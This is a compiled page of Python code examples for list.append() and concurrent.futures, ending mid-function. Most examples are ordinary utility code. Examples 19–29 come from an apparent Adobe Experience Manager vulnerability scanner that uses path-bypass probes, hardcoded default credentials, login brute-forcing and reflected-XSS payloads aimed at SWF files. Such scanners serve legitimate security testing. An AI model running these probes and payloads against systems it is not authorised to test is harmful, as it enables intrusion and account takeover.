Python source code examples: concurrent.futures and list.append()

(Note: concurrent.futures has no append() method of its own; the recurring pattern in these examples is a plain Python list collecting the Future objects returned by executor.submit(), or other per-item results.)

Example 1
import concurrent.futures
from typing import Any, Callable, Sequence

def paralelize(
    objects: Sequence[Any],
    worker: Callable[[Sequence[Any]], Any],
    max_threads: int = 10,
) -> Sequence[concurrent.futures.Future]:
    """Parallelize tasks using a connector on a list of URLs.

    URLs are split into up to max_threads chunks and each chunk is processed
    in its own thread. Connectors in the worker method MUST be duplicated to
    ensure thread safety.

    :returns: collection of Future objects, one per thread. It is the
        caller's responsibility to check whether the threads finished
        successfully.
    """
    number_of_chunks = min(len(objects), max_threads)
    # `chunks` is a project helper (not shown here) that splits a sequence
    # into the given number of roughly equal parts.
    objects_chunks = chunks(objects, number_of_chunks)

    futures = []
    with concurrent.futures.ThreadPoolExecutor(max_workers=max_threads) as executor:
        for objects_chunk in objects_chunks:
            futures.append(executor.submit(worker, objects_chunk))
    return futures 
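A minimal usage sketch; the chunks helper below is a hypothetical stand-in for the project's own helper, and fetch_all is a dummy worker:

def chunks(seq, n):
    """Split seq into n nearly equal contiguous parts (hypothetical helper)."""
    k, m = divmod(len(seq), n)
    return [seq[i * k + min(i, m):(i + 1) * k + min(i + 1, m)] for i in range(n)]

def fetch_all(urls):
    return [url.upper() for url in urls]  # stand-in for real connector work

futures = paralelize(['http://a', 'http://b', 'http://c'], worker=fetch_all)
for future in futures:
    print(future.result())  # e.g. ['HTTP://A']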
Example 2
def append(self, resultFile, resultElem, all_columns=False):
        """
        Append the result for one run. Needs to be called before collect_data().
        """
        self._xml_results += [
            (result, resultFile) for result in _get_run_tags_from_xml(resultElem)
        ]
        for attrib, values in RunSetResult._extract_attributes_from_result(
            resultFile, resultElem
        ).items():
            self.attributes[attrib].extend(values)

        if not self.columns:
            self.columns = RunSetResult._extract_existing_columns_from_result(
                resultFile, resultElem, all_columns
            ) 
Example 3
def insert_logfile_names(resultFile, resultElem):
    # get folder of logfiles (truncate end of XML file name and append .logfiles instead)
    log_folder = resultFile[0 : resultFile.rfind(".results.")] + ".logfiles/"

    # append the run-set name, which forms the beginning of each log-file name
    runSetName = resultElem.get("name")
    if runSetName is not None:
        blockname = resultElem.get("block")
        if blockname is None:
            log_folder += runSetName + "."
        elif blockname == runSetName:
            pass  # real runSetName is empty
        else:
            assert runSetName.endswith("." + blockname)
            runSetName = runSetName[: -(1 + len(blockname))]  # remove last chars
            log_folder += runSetName + "."

    # for each file: append original filename and insert log_file_name into sourcefileElement
    for sourcefile in _get_run_tags_from_xml(resultElem):
        if "logfile" in sourcefile.attrib:
            log_file = urllib.parse.urljoin(resultFile, sourcefile.get("logfile"))
        else:
            log_file = log_folder + os.path.basename(sourcefile.get("name")) + ".log"
        sourcefile.set("logfile", log_file) 
Example 4
def serve(self):
        try:
            token, key, value = self.path.split('/')[1:4]
        except ValueError:  # path does not contain token/key/value
            self.send_response(200)
            return

        if self.token != token:
            self.send_response(200)
            return

        if key in self.d:
            self.d[key].append(value)
        else:
            self.d[key] = [value]  # equivalently: self.d.setdefault(key, []).append(value)

        self.send_response(200) 
Example 5
def get_chapters(self, chapter_object):
        """Queries the series details API and creates a chapter object for each
        chapter listed.
        """
        response = requests.get(self.api_hook_details).json()
        chapters = []
        for chapter in response['chapters']:
            if int(chapter['chapter']['subchapter']) > 0:
                chapter_number = '.'.join([chapter['chapter']['chapter'],
                                           chapter['chapter']['subchapter']])
            else:
                chapter_number = chapter['chapter']['chapter']
            kwargs = {
                'name': self.name,
                'alias': self.alias,
                'chapter': chapter_number,
                'api_id': chapter['chapter']['id'],
                'url': chapter['chapter']['href'],
                'title': chapter['chapter']['name'],
                'groups': [team['name'] for team in chapter['teams']]
            }
            chapter = chapter_object(**kwargs)
            chapters.append(chapter)
        return chapters 
Example 6
def get_chapters(self):
        chapters = []
        for t in self.json['taggings']:
            if 'permalink' in t and 'title' in t:
                name_parts = re.search(name_re, t['title'])
                if not name_parts:
                    name_parts = re.search(fallback_re, t['title'])
                    chapter = name_parts.group('num')
                elif name_parts.group('type') == 'Special':
                    chapter = 'Special ' + name_parts.group('num')
                else:
                    chapter = name_parts.group('num')
                title = name_parts.group('title')
                url = urljoin('https://dynasty-scans.com/chapters/',
                              t['permalink'])
                c = DynastyScansChapter(name=self.name, alias=self.alias,
                                        chapter=chapter, url=url, title=title)
                chapters.append(c)
        return chapters 
Example 7
def latest(alias, relative):
    """List most recent chapter addition for series."""
    query = db.session.query(db.Series)
    if alias:
        query = query.filter_by(following=True, alias=alias)
    else:
        query = query.filter_by(following=True)
    query = query.order_by(db.Series.alias).all()
    updates = []
    for series in query:
        if series.last_added is None:
            time = 'never'
        elif relative:
            time = utility.time_to_relative(series.last_added)
        else:
            time = series.last_added.strftime('%Y-%m-%d %H:%M')
        updates.append((series.alias, time))
    output.even_columns(updates, separator_width=3) 
Example 8
def main(_):
  tf_config = os.environ.get('TF_CONFIG', None)
  logging.info(tf_config)
  config = json.loads(tf_config)
  job_type = config.get('task', {}).get('type')
  os.environ.update({'PYTHONPATH': '/'})
  executor = concurrent.futures.ThreadPoolExecutor(
      max_workers=FLAGS.actors_per_worker)
  futures = []
  if job_type == 'master':
    futures.append(run_learner(executor, config))
  else:
    assert job_type == 'worker', 'Unexpected task type: {}'.format(job_type)
    for actor_id in range(FLAGS.actors_per_worker):
      futures.append(run_actor(executor, config, actor_id))
  for f in futures:
    f.result() 
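For reference, a TF_CONFIG value this parser would accept could look like the following (a hypothetical two-worker cluster; real cluster specs depend on the deployment):

import json
import os

os.environ['TF_CONFIG'] = json.dumps({
    'cluster': {
        'master': ['10.0.0.1:8000'],
        'worker': ['10.0.0.2:8000', '10.0.0.3:8000'],
    },
    # read above via config.get('task', {}).get('type')
    'task': {'type': 'worker', 'index': 0},
})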
Example 9
def _get_paginated_response(self, url, params=None):
        url = self.add_slash(url)
        response_data = self._get_first_page(url, params)
        count = response_data.get('count', 0)
        page_count = int(math.ceil(float(count) / PAGINATION_LIMIT))
        self._logger.debug('Calculated that there are {} pages to get'.format(page_count))
        for result in response_data.get('results', []):
            yield result
        if page_count:
            with concurrent.futures.ThreadPoolExecutor(max_workers=25) as executor:
                futures = []
                if not params:
                    params = {}
                for index in range(page_count, 1, -1):
                    # Page 1 was already consumed above, so fetch pages page_count..2.
                    params.update({'page': index})
                    # copy() gives each request its own snapshot of the 'page' value.
                    futures.append(executor.submit(self.session.get, url, params=params.copy()))
                for future in concurrent.futures.as_completed(futures):
                    try:
                        response = future.result()
                        response_data = response.json()
                        response.close()
                        for result in response_data.get('results'):
                            yield result
                    except Exception:  # pylint: disable=broad-except
                        self._logger.exception('Future failed...') 
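The fan-out idiom above, distilled into a self-contained sketch (fetch_page is a stand-in for session.get returning parsed JSON):

import concurrent.futures

def fetch_page(page):  # stand-in for self.session.get(url, params=...).json()
    return {'results': ['item-{}-{}'.format(page, i) for i in range(2)]}

def iter_remaining_results(page_count):
    with concurrent.futures.ThreadPoolExecutor(max_workers=4) as executor:
        futures = [executor.submit(fetch_page, page) for page in range(2, page_count + 1)]
        # as_completed yields futures in completion order, not submission order
        for future in concurrent.futures.as_completed(futures):
            for result in future.result()['results']:
                yield result

print(sorted(iter_remaining_results(4)))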
Example 10
def get_urls(inputfiles):
    """
    This function takes as input the list of files containing the hostnames
    and normalizes the format of the hostnames in order to be able to perform
    valid HTTP/HTTPS requests.

    Args:
    inputfiles -- list of inputfiles

    Returns:
    urls       -- list of normalized URLs which can be queried
    """
    urls = []
    scheme_rgx = re.compile(r'^https?://')
    for ifile in inputfiles:
        urls.append(ifile.read().splitlines())
    # flatten the per-file line lists, deduplicate, and drop empty lines
    urls = set([n for l in urls for n in l])
    urls = list(filter(None, urls))
    for i in range(len(urls)):
        if not scheme_rgx.match(urls[i]):
            urls[i] = 'http://' + urls[i]
    return urls 
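A quick usage sketch with an in-memory file standing in for a real input file (get_urls itself relies on a module-level import of re):

import io

files = [io.StringIO('example.com\nhttps://secure.example.org\n\n')]
print(sorted(get_urls(files)))
# ['http://example.com', 'https://secure.example.org']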
Example 11
def new_check(self):
        c = Check()
        self.checks.append(c)
        return c 
Example 12
def handle_union_tag(
    tag, table_definition_file, options, default_columns, columns_relevant_for_diff
):
    columns = (
        extract_columns_from_table_definition_file(tag, table_definition_file)
        or default_columns
    )
    result = RunSetResult([], collections.defaultdict(list), columns)
    all_result_files = set()

    for resultTag in tag.findall("result"):
        if extract_columns_from_table_definition_file(resultTag, table_definition_file):
            logging.warning(
                "<result> tags within <union> tags may not contain <column> tags, "
                "these column declarations will be ignored. Please move them to the <union> tag."
            )
        run_set_id = resultTag.get("id")
        for resultsFile in get_file_list_from_result_tag(
            resultTag, table_definition_file
        ):
            if resultsFile in all_result_files:
                handle_error("File '%s' included twice in <union> tag", resultsFile)
            all_result_files.add(resultsFile)
            result_xml = parse_results_file(resultsFile, run_set_id)
            if result_xml is not None:
                result.append(resultsFile, result_xml, options.all_columns)

    if not result._xml_results:
        return None

    name = tag.get("name")
    if name:
        logging.warning(
            "Attribute 'name' for <union> tags is deprecated, use 'title' instead."
        )
    name = tag.get("title", name)
    if name:
        result.attributes["name"] = [name]
    result.collect_data(options.correct_only)
    return result 
Example 13
def extract_columns_from_table_definition_file(xmltag, table_definition_file):
    """
    Extract all columns mentioned in the result tag of a table definition file.
    """

    def handle_path(path):
        """Convert path from a path relative to table-definition file."""
        if not path or path.startswith("http://") or path.startswith("https://"):
            return path
        return os.path.join(os.path.dirname(table_definition_file), path)

    columns = []
    for c in xmltag.findall("column"):
        scale_factor = c.get("scaleFactor")
        display_unit = c.get("displayUnit")
        source_unit = c.get("sourceUnit")

        new_column = Column(
            c.get("title"),
            c.text,
            c.get("numberOfDigits"),
            handle_path(c.get("href")),
            None,
            display_unit,
            source_unit,
            scale_factor,
            c.get("relevantForDiff"),
            c.get("displayTitle"),
        )
        columns.append(new_column)

    return columns 
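An illustrative call, building the <column> tag in memory; the attribute names are exactly the ones read above, the column key is the tag text, and the Column class is assumed to come from the surrounding project:

import xml.etree.ElementTree as ET

result_tag = ET.fromstring(
    '<result>'
    '<column title="CPU Time" numberOfDigits="2" displayUnit="s">cputime</column>'
    '</result>'
)
columns = extract_columns_from_table_definition_file(result_tag, 'my-table.xml')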
Example 14
def collect_data(self, correct_only):
        """
        Load the actual result values from the XML file and the log files.
        This may take some time if many log files have to be opened and parsed.
        """
        self.results = []

        def get_value_from_logfile(lines, identifier):
            """
            This method searches for values in lines of the content.
            It uses a tool-specific method to do so.
            """
            return load_tool(self).get_value_from_output(lines, identifier)

        # Opening the ZIP archive with the logs for every run is too slow, we cache it.
        log_zip_cache = {}
        try:
            for xml_result, result_file in self._xml_results:
                self.results.append(
                    RunResult.create_from_xml(
                        xml_result,
                        get_value_from_logfile,
                        self.columns,
                        correct_only,
                        log_zip_cache,
                        self.columns_relevant_for_diff,
                        result_file,
                    )
                )
        finally:
            for file in log_zip_cache.values():
                file.close()

        for column in self.columns:
            column_values = (
                run_result.values[run_result.columns.index(column)]
                for run_result in self.results
            )
            column.set_column_type_from(column_values)

        del self._xml_results 
Example 15
def merge_task_lists(runset_results, tasks):
    """
    Set the filelists of all RunSetResult elements so that they contain the same files
    in the same order. For missing files a dummy element is inserted.
    """
    for runset in runset_results:
        # create mapping from id to RunResult object
        # Use a reversed list so that the first instance of equal tasks ends up in the dict
        dic = {
            run_result.task_id: run_result for run_result in reversed(runset.results)
        }
        runset.results = []  # clear and repopulate results
        for task in tasks:
            run_result = dic.get(task)
            if run_result is None:
                logging.info("    No result for task %s in '%s'.", task, runset)
                # create an empty dummy element
                run_result = RunResult(
                    task,
                    None,
                    "empty",  # special category for tables
                    None,
                    None,
                    runset.columns,
                    [None] * len(runset.columns),
                )
            runset.results.append(run_result) 
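The reversed-iteration trick keeps the first occurrence when task ids collide; a minimal demonstration with plain pairs:

pairs = [('t1', 'first'), ('t2', 'only'), ('t1', 'second')]
dic = {key: value for key, value in reversed(pairs)}
print(dic['t1'])  # 'first' -- iterating in reverse lets earlier list entries overwrite later ones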
Example 16
def get_rows(runSetResults):
    """
    Create list of rows with all data. Each row consists of several RunResults.
    """
    rows = []
    for task_results in zip(*[runset.results for runset in runSetResults]):
        rows.append(Row(task_results))

    return rows 
Example 17
def select_relevant_id_columns(rows):
    """
    Find out which of the entries in Row.id are equal for all given rows.
    @return: A list of True/False values according to whether the i-th part of the id is always equal.
    """
    relevant_id_columns = [True]  # first column (file name) is always relevant
    if rows:
        prototype_id = rows[0].id
        for column in range(1, len(prototype_id)):

            def id_equal_to_prototype(row):
                # 'column' is looked up when the function is called, which
                # happens immediately below, so this loop-variable closure is safe
                return row.id[column] == prototype_id[column]

            relevant_id_columns.append(not all(map(id_equal_to_prototype, rows)))
    return relevant_id_columns 
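A worked example with a minimal stand-in for the project's Row class:

from collections import namedtuple

FakeRow = namedtuple('FakeRow', 'id')
rows = [FakeRow(('a.c', 'prop', 'x')), FakeRow(('b.c', 'prop', 'y'))]
print(select_relevant_id_columns(rows))  # [True, False, True]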
Example 18
def _PredictOneCheckpoint(self, checkpoint, output_dir):
    """Runs predictor."""
    tf.logging.info('Processing checkpoint %s.', checkpoint)
    self._predictor.Load(checkpoint)

    def LockedRunBatch(batch, batch_id):
      """TPU inference runs the i-th batch on the i%num_cores-th core.

      Make sure that core is available before scheduling the next batch on it.

      Args:
        batch: The input to be passed to RunBatch.
        batch_id: The id of this batch, which determines which core it runs on.
      """
      with self._locks[batch_id % len(self._locks)]:
        self.RunBatch(output_dir, batch)

    batch_id = 0
    batch = []
    futures = []
    # Iterate through the input and process it one batch at a time.
    it = self.InputGenerator()
    if self._max_inputs > 0:
      it = itertools.islice(it, self._max_inputs)
    for next_id, element in enumerate(it):
      if self._ShouldProcessInputId(next_id):
        batch.append((next_id, element))
        if len(batch) == self._batch_size:
          futures.append(
              self._threadpool.submit(LockedRunBatch, batch, batch_id))
          batch_id += 1
          batch = []
    # Last batch.
    if batch:
      futures.append(self._threadpool.submit(LockedRunBatch, batch, batch_id))
    # Wait for completion.
    for f in futures:
      f.result() 
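The per-core locking idea above, distilled with stand-in names (num_cores and the batch payloads are hypothetical):

import threading
from concurrent.futures import ThreadPoolExecutor

num_cores = 4
locks = [threading.Lock() for _ in range(num_cores)]

def locked_run_batch(batch_id, batch):
    # batches mapped to the same core (batch_id % num_cores) run serially,
    # while batches mapped to different cores may overlap
    with locks[batch_id % num_cores]:
        print('running batch', batch_id, 'with', len(batch), 'items')

with ThreadPoolExecutor(max_workers=num_cores * 2) as pool:
    futures = [pool.submit(locked_run_batch, i, [i]) for i in range(8)]
    for f in futures:
        f.result()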
Example 19
def exposed_set_preferences(base_url, my_host, debug=False, proxy=None):
    r = random_string(3)

    SETPREFERENCES = itertools.product(('/crx/de/setPreferences.jsp', '///crx///de///setPreferences.jsp'),
                                   (';%0a{0}.html', '/{0}.html'),
                                   ('?keymap=<1337>&language=0',))
    SETPREFERENCES = list('{0}{1}{2}'.format(p1, p2.format(r), p3) for p1, p2, p3 in SETPREFERENCES)

    results = []

    for path in SETPREFERENCES:
        url = normalize_url(base_url, path)

        try:
            resp = http_request(url, proxy=proxy)

            if resp.status_code == 400:
                if '<1337>' in resp.content.decode():
                    f = Finding('SetPreferences', url,
                                'Page setPreferences.jsp is exposed, XSS might be possible via keymap parameter.')

                    results.append(f)
                    break
        except Exception:
            if debug:
                error('Exception while performing a check', check='exposed_set_preferences', url=url)

    return results 
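To make the path-construction idiom used by these checks concrete, one of the itertools.product tables expands as follows (r stands in for random_string(3)):

import itertools

r = 'abc'
paths = itertools.product(('/crx/de/setPreferences.jsp',),
                          (';%0a{0}.html', '/{0}.html'),
                          ('?keymap=<1337>&language=0',))
for p1, p2, p3 in paths:
    print('{0}{1}{2}'.format(p1, p2.format(r), p3))
# /crx/de/setPreferences.jsp;%0aabc.html?keymap=<1337>&language=0
# /crx/de/setPreferences.jsp/abc.html?keymap=<1337>&language=0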
Example 20
def exposed_merge_metadata(base_url, my_host, debug=False, proxy=None):
    r = random_string(3)

    MERGEMETADATA = itertools.product(('/libs/dam/merge/metadata', '///libs///dam///merge///metadata'),
                                   ('.html', '.css/{0}.html', '.ico/{0}.html', '....4.2.1....json/{0}.html',
                                    '.css;%0a{0}.html', '.ico;%0a{0}.html'),
                                   ('?path=/etc&.ico',))
    MERGEMETADATA = list('{0}{1}{2}'.format(p1, p2.format(r), p3) for p1, p2, p3 in MERGEMETADATA)

    results = []

    for path in MERGEMETADATA:
        url = normalize_url(base_url, path)

        try:
            resp = http_request(url, proxy=proxy)

            if resp.status_code == 200:
                try:
                    # probe: response must be valid JSON with an 'assetPaths' key
                    json.loads(resp.content.decode())['assetPaths']
                except Exception:
                    pass
                else:
                    f = Finding('MergeMetadataServlet', url,
                                'MergeMetadataServlet is exposed, XSS might be possible via path parameter.')

                    results.append(f)
                    break
        except Exception:
            if debug:
                error('Exception while performing a check', check='exposed_merge_metadata', url=url)

    return results 
Example 21
def exposed_get_servlet(base_url, my_host, debug=False, proxy=None):
    r = random_string(3)

    GETSERVLET = itertools.product(('/', '/etc', '/var', '/apps', '/home', '///etc', '///var', '///apps', '///home'),
                                   ('', '.children'),
                                   ('.json', '.1.json', '....4.2.1....json', '.json?{0}.css', '.json?{0}.ico', '.json?{0}.html',
                                   '.json/{0}.css', '.json/{0}.html', '.json/{0}.png', '.json/{0}.ico',
                                   '.json;%0a{0}.css', '.json;%0a{0}.png', '.json;%0a{0}.html', '.json;%0a{0}.ico'))
    GETSERVLET = list('{0}{1}{2}'.format(p1, p2, p3.format(r)) for p1, p2, p3 in GETSERVLET)

    results = []

    for path in GETSERVLET:
        url = normalize_url(base_url, path)

        try:
            resp = http_request(url, proxy=proxy)

            if resp.status_code == 200:
                try:
                    json.loads(resp.content.decode())
                    # probe: valid JSON that also exposes JCR node properties
                    if 'jcr:primaryType' not in resp.content.decode():
                        raise Exception()
                except Exception:
                    pass
                else:
                    f = Finding('DefaultGetServlet', url,
                                'Sensitive information might be exposed via AEM\'s DefaultGetServlet. '
                                'Check child nodes manually for secrets exposed, see - '
                                'https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43')

                    results.append(f)
        except Exception:
            if debug:
                error('Exception while performing a check', check='exposed_get_servlet', url=url)

    return results 
Example 22
def exposed_post_servlet(base_url, my_host, debug=False, proxy=None):
    r = random_string(3)

    POSTSERVLET = itertools.product(('/', '/content', '/content/dam'),
                                    ('.json', '.1.json', '...4.2.1...json', '.json/{0}.css', '.json/{0}.html',
                                     '.json;%0a{0}.css', '.json;%0a{0}.html'))
    POSTSERVLET = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in POSTSERVLET)

    results = []
    for path in POSTSERVLET:
        url = normalize_url(base_url, path)
        try:
            data = ':operation=nop'
            headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url}
            resp = http_request(url, 'POST', data=data, additional_headers=headers, proxy=proxy, debug=debug)

            if resp.status_code == 200 and 'Null Operation Status:' in str(resp.content):
                f = Finding('POSTServlet', url,
                            'POSTServlet is exposed, persistent XSS or RCE might be possible, it depends on your privileges.')
                results.append(f)
                break
        except Exception:
            if debug:
                error('Exception while performing a check', check='exposed_post_servlet', url=url)

    return results 
Example 23
def create_new_nodes2(base_url, my_host, debug=False, proxy=None):
    CREDS = ('author:author', 'grios:password', 'aparker@geometrixx.info:aparker', 'jdoe@geometrixx.info:jdoe',
             'james.devore@spambob.com:password', 'matt.monroe@mailinator.com:password',
             'aaron.mcdonald@mailinator.com:password', 'jason.werner@dodgit.com:password')

    nodename = random_string()
    r = random_string(3)
    POSTSERVLET = itertools.product(('/home/users/geometrixx/{0}/', ),
                                    ('*', '{0}.json', '{0}.1.json', '{0}.json/{1}.css',
                                     '{0}.json/{1}.html', '{0}.json/{1}.ico', '{0}.json/{1}.png',
                                     '{0}.json/{1}.1.json', '{0}.json;%0a{1}.css', '{0}.json;%0a{1}.html',
                                     '{0}.json;%0a{1}.png', '{0}.json;%0a{1}.ico',
                                     '{0}....4.2.1....json', '{0}?{1}.ico', '{0}?{1}.css',
                                     '{0}?{1}.html', '{0}?{1}.json', '{0}?{1}.1.json',
                                     '{0}?{1}....4.2.1....json'))
    POSTSERVLET = list('{0}{1}'.format(p1, p2.format(nodename, r)) for p1, p2 in POSTSERVLET)

    results = []
    for path, creds in itertools.product(POSTSERVLET, CREDS):
        path = path.format(creds.split(':')[0])
        url = normalize_url(base_url, path)
        try:
            headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url,
                       'Authorization': 'Basic {}'.format(base64.b64encode(creds.encode()).decode())}
            data = 'a=b'
            resp = http_request(url, 'POST', data=data, additional_headers=headers, proxy=proxy)

            if '<td>Parent Location</td>' in str(resp.content) and resp.status_code in [200, 201]:
                f = Finding('CreateJCRNodes 2', url,
                            'It\'s possible to create new JCR nodes using POST Servlet. As Geometrixx user "{0}". '
                            'You might get persistent XSS or perform other attack by accessing servlets registered by Resource Type.'.format(creds))
                results.append(f)
                break
        except Exception:
            if debug:
                error('Exception while performing a check', check='create_new_nodes2', url=url)

    return results 
Example 24
def exposed_loginstatus_servlet(base_url, my_host, debug=False, proxy=None):
    global CREDS

    r = random_string(3)
    LOGINSTATUS = itertools.product(('/system/sling/loginstatus', '///system///sling///loginstatus'),
                                    ('.json', '.css', '.ico', '.png', '.gif', '.html', '.js', '.json/{0}.1.json',
                                     '.json;%0a{0}.css', '.json;%0a{0}.html', '.json;%0a{0}.png',
                                     '.json;%0a{0}.ico', '...4.2.1...json'))
    LOGINSTATUS = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in LOGINSTATUS)

    results = []
    for path in LOGINSTATUS:
        url = normalize_url(base_url, path)
        try:
            resp = http_request(url, proxy=proxy, debug=debug)

            if resp.status_code == 200 and 'authenticated=' in str(resp.content):
                f = Finding('LoginStatusServlet', url,
                            'LoginStatusServlet is exposed, it allows to bruteforce credentials. '
                            'You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node.')
                results.append(f)

                for creds in CREDS:
                    headers = {'Authorization': 'Basic {}'.format(base64.b64encode(creds.encode()).decode())}
                    resp = http_request(url, additional_headers=headers, proxy=proxy, debug=debug)

                    if 'authenticated=true' in str(resp.content):
                        f = Finding('AEM with default credentials', url,
                                    'AEM with default credentials "{0}".'.format(creds))
                        results.append(f)

                break
        except Exception:
            if debug:
                error('Exception while performing a check', check='exposed_loginstatus_servlet', url=url)

    return results
Example 25
def exposed_userinfo_servlet(base_url, my_host, debug=False, proxy=None):
    global CREDS

    r = random_string(3)
    USERINFO = itertools.product(('/libs/cq/security/userinfo', '///libs///cq///security///userinfo'),
                                    ('.json', '.css', '.ico', '.png', '.gif', '.html', '.js',
                                     '.json?{0}.css', '.json/{0}.1.json',
                                     '.json;%0a{0}.css', '.json;%0a{0}.html',
                                     '.json;%0a{0}.ico', '...4.2.1...json'))

    USERINFO = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in USERINFO)

    results = []
    for path in USERINFO:
        url = normalize_url(base_url, path)
        try:
            resp = http_request(url, proxy=proxy, debug=debug)

            if resp.status_code == 200 and 'userID' in str(resp.content):
                f = Finding('UserInfoServlet', url,
                    'UserInfoServlet is exposed, it allows to bruteforce credentials. '
                    'You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node.')
                results.append(f)

                for creds in CREDS:
                    headers = {'Authorization': 'Basic {}'.format(base64.b64encode(creds.encode()).decode())}
                    resp = http_request(url, additional_headers=headers, proxy=proxy, debug=debug)

                    if 'anonymous' not in str(resp.content):
                        f = Finding('AEM with default credentials', url,
                                    'AEM with default credentials "{0}".'.format(creds))
                        results.append(f)

                break
        except Exception:
            if debug:
                error('Exception while performing a check', check='exposed_userinfo_servlet', url=url)

    return results 
Example 26
def exposed_felix_console(base_url, my_host, debug=False, proxy=None):
    r = random_string(3)

    FELIXCONSOLE = itertools.product(('/system/console/bundles', '///system///console///bundles'),
                                    ('', '.json', '.1.json', '.4.2.1...json', '.css', '.ico', '.png', '.gif', '.html', '.js',
                                     ';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.png', '.json;%0a{0}.ico', '.servlet/{0}.css',
                                     '.servlet/{0}.js', '.servlet/{0}.html', '.servlet/{0}.ico'))
    FELIXCONSOLE = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in FELIXCONSOLE)

    results = []
    for path in FELIXCONSOLE:
        url = normalize_url(base_url, path)
        headers = {'Authorization': 'Basic YWRtaW46YWRtaW4='}
        try:
            resp = http_request(url, additional_headers=headers, proxy=proxy, debug=debug)

            if resp.status_code == 200 and 'Web Console - Bundles' in str(resp.content):
                f = Finding('FelixConsole', url,
                            'Felix Console is exposed, you may get RCE by installing OSGI bundle. '
                            'See - https://github.com/0ang3el/aem-rce-bundle')
                results.append(f)

                break
        except Exception:
            if debug:
                error('Exception while performing a check', check='exposed_felix_console', url=url)

    return results 
Example 27
def exposed_wcmdebug_filter(base_url, my_host, debug=False, proxy=None):
    r = random_string(3)

    WCMDEBUG = itertools.product(('/', '/content', '/content/dam'),
                                 ('.json', '.1.json', '...4.2.1...json', '.json/{0}.css',
                                  '.json/{0}.html', '.json/{0}.ico', '.json;%0a{0}.css', '.json;%0a{0}.html', '.json;%0a{0}.ico'),
                                 ('?debug=layout',))
    WCMDEBUG = list('{0}{1}{2}'.format(p1, p2.format(r), p3) for p1, p2, p3 in WCMDEBUG)

    results = []
    for path in WCMDEBUG:
        url = normalize_url(base_url, path)
        try:
            resp = http_request(url, proxy=proxy, debug=debug)

            if resp.status_code == 200 and 'res=' in str(resp.content) and 'sel=' in str(resp.content):
                f = Finding('WCMDebugFilter', url,
                            'WCMDebugFilter exposed and might be vulnerable to reflected XSS (CVE-2016-7882). '
                            'See - https://medium.com/@jonathanbouman/reflected-xss-at-philips-com-e48bf8f9cd3c')

                results.append(f)
                break
        except Exception:
            if debug:
                error('Exception while performing a check', check='exposed_wcmdebug_filter', url=url)

    return results 
Example 28
def exposed_wcmsuggestions_servlet(base_url, my_host, debug=False, proxy=None):
    r = random_string(3)

    WCMSUGGESTIONS = itertools.product(('/bin/wcm/contentfinder/connector/suggestions', '///bin///wcm///contentfinder///connector///suggestions'),
                                       ('.json', '.css', '.html', '.ico', '.png', '.gif', '.json/{0}.1.json',
                                        '.json;%0a{0}.css', '.json/{0}.css', '.json/{0}.ico',
                                        '.json/{0}.html', '...4.2.1...json'),
                                       ('?query_term=path%3a/&pre=<1337abcdef>&post=yyyy',))
    WCMSUGGESTIONS = list('{0}{1}{2}'.format(p1, p2.format(r), p3) for p1, p2, p3 in WCMSUGGESTIONS)

    results = []
    for path in WCMSUGGESTIONS:
        url = normalize_url(base_url, path)
        try:
            resp = http_request(url, proxy=proxy, debug=debug)

            if resp.status_code == 200 and '<1337abcdef>' in str(resp.content):
                f = Finding('WCMSuggestionsServlet', url,
                            'WCMSuggestionsServlet exposed and might result in reflected XSS. '
                            'See - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=96')

                results.append(f)
                break
        except Exception:
            if debug:
                error('Exception while performing a check', check='exposed_wcmsuggestions_servlet', url=url)

    return results 
Example 29
def swf_xss(base_url, my_host, debug=False, proxy=None):
    SWFS = (
        '/etc/clientlibs/foundation/video/swf/player_flv_maxi.swf?onclick=javascript:confirm(document.domain)',
        '/etc/clientlibs/foundation/video/swf/player_flv_maxi.swf.res?onclick=javascript:confirm(document.domain)',
        '/etc/clientlibs/foundation/shared/endorsed/swf/slideshow.swf?contentPath=%5c"))%7dcatch(e)%7balert(document.domain)%7d//',
        '/etc/clientlibs/foundation/shared/endorsed/swf/slideshow.swf.res?contentPath=%5c"))%7dcatch(e)%7balert(document.domain)%7d//',
        '/etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf?javascriptCallbackFunction=alert(document.domain)-String',
        '/etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf.res?javascriptCallbackFunction=alert(document.domain)-String',
        '/libs/dam/widgets/resources/swfupload/swfupload_f9.swf?swf?movieName=%22])%7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d//',
        '/libs/dam/widgets/resources/swfupload/swfupload_f9.swf.res?swf?movieName=%22])%7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d//',
        '/libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22])%7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d//',
        '/libs/cq/ui/resources/swfupload/swfupload.swf.res?movieName=%22])%7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d//',
        '/etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf?stagesize=1&namespacePrefix=alert(document.domain)-window',
        '/etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf.res?stagesize=1&namespacePrefix=alert(document.domain)-window',
        '/etc/dam/viewers/s7sdk/2.9/flash/VideoPlayer.swf?loglevel=,firebug&movie=%5c%22));if(!self.x)self.x=!alert(document.domain)%7dcatch(e)%7b%7d//',
        '/etc/dam/viewers/s7sdk/2.9/flash/VideoPlayer.swf.res?loglevel=,firebug&movie=%5c%22));if(!self.x)self.x=!alert(document.domain)%7dcatch(e)%7b%7d//',
        '/etc/dam/viewers/s7sdk/3.2/flash/VideoPlayer.swf?stagesize=1&namespacePrefix=window[/aler/.source%2b/t/.source](document.domain)-window',
        '/etc/dam/viewers/s7sdk/3.2/flash/VideoPlayer.swf.res?stagesize=1&namespacePrefix=window[/aler/.source%2b/t/.source](document.domain)-window'
    )

    results = []
    for path in SWFS:
        url = normalize_url(base_url, path)
        try:
